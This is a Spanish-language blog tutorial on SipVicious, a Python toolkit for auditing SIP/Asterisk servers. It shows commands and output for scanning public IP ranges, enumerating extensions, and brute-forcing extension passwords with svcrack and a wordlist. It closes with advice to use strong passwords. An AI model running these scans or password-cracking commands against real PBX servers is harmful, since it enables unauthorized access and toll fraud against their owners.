SipVicious - Utilidad de seguridad para SIP y Asterisk

SipVicious es una utilidad que podemos usar para probar si la configuración SIP de nuestro servidor Asterisk es segura. Se compone de cuatro programas, escritos en lenguaje Python:

  • svmap: Escanea una dirección IP o una serie de direcciones IP para averiguar si hay dispositivos SIP
  • svwar: Escanea una centralita PBX buscando el numero de extensiones presentes y si están protegidas con contraseña
  • svcrack: Intenta obtener la contraseña de una extensión SIP en un servidor PBX
  • svreport: Genera reportes de diferente tipo

Primero tenemos que instalar Python

yum install python

luego descargamos el programa

cd /tmp

wget http://sipvicious.googlecode.com/files/sipvicious-0.2.4.tar.gz

lo descomprimimos

tar -xf sipvicious-0.2.4.tar.gz

entramos en la carpeta

cd sipvicious-0.2.4

y empezamos a hacer nuestras pruebas. La verdad me quedé asombrado por la cantidad de servidores PBX que hay en la red

 ./svmap.py 67.18.186.202

| SIP Device         | User Agent | Fingerprint                                        |
----------------------------------------------------------------------------------------
| 67.18.186.202:5060 | X-Lite     | Asterisk / Linksys/PAP2T-3.1.15(LS) / Asterisk PBX |

para un solo IP

./svmap.py 67.18.186.1-67.18.186.255
| SIP Device         | User Agent   | Fingerprint                                        |
------------------------------------------------------------------------------------------
| 67.18.186.67:5060  | Asterisk PBX | Asterisk / Linksys/PAP2T-3.1.15(LS)                |
| 67.18.186.202:5060 | X-Lite       | Asterisk / Linksys/PAP2T-3.1.15(LS) / Asterisk PBX |
| 67.18.186.128:5060 | Asterisk PBX | Asterisk / Linksys/PAP2T-3.1.15(LS)                |

para una serie de direcciones IP

Una vez que tengamos la lista podemos buscar las extensiones

./svwar.py 67.18.186.128

| Extension | Authentication |
------------------------------
| 120       | reqauth        |
| 102       | reqauth        |
| 103       | reqauth        |
| 100       | reqauth        |
| 101       | reqauth        |
| 104       | reqauth        |

En ese servidor hay configuradas por lo menos 6 extensiones SIP y cada una requiere una contraseña para conectarse. Digo por lo menos porque si arrancamos svwar sin ninguna opción, éste busca solamente extensiones que van desde 1 hasta 999

Si queremos buscar extensiones distintas tenemos que especificarlo en la línea del comando

./svwar.py -e1000-2000 67.18.186.128

con la opción -e1000-2000 el programa buscará en el servidor especificado extensiones que van desde 1000 hasta 2000

con svcrack intentamos hallar la clave de una extensión especifica. Aquí van dos diferentes formas de usarlo:

/svcrack.py -u 100 67.18.186.128

intentará hallar la contraseña de la extensión 100 en la IP especificada. En este modo, sin más opciones, usará como contraseña los números de 1 a 999

para pasarle una lista de contraseñas podemos crear un archivo de texto y poner una contraseña por línea. Ejemplo

nano pass.txt

escribimos una serie de contraseñas (una por línea)

fulano

sutano

etc...

guardamos el archivo

y volvemos a swcrack

./svcrack.py -u100 -d pass.txt 67.18.186.128

Para terminar tenemos la posibilidad de crear reportes de las actividades.

./svmap.py 79.10.100.1-79.10.100.255 -s scan1

con la opción -s scan1 guardamos la sesión con el nombre scan1

luego podemos crear el reporte

./svreport.py export -f txt -o scan1.txt -s scan1

para crear el reporte en pdf visiten esta pagina

Todos los comandos tienes un ayuda en linea.

./svmap.py --help

Para más información hagan referencia a la pagina de los desarrolladores.

Mi juicio personal, es que una cosa es encontrar los servidores SIP y otra "robarse" las contrasenas de las extensiones. Si Tenemos nuestro archivo sip.conf bien configurado y usamos contrasenas alfanumericas, podemos dormir tranquilos.

Que opinan?

 

Etiquetas: 

Subscribe to Comments for "SipVicious - Utilidad de seguridad para SIP y Asterisk" Subscribe to VozToVoice - All comments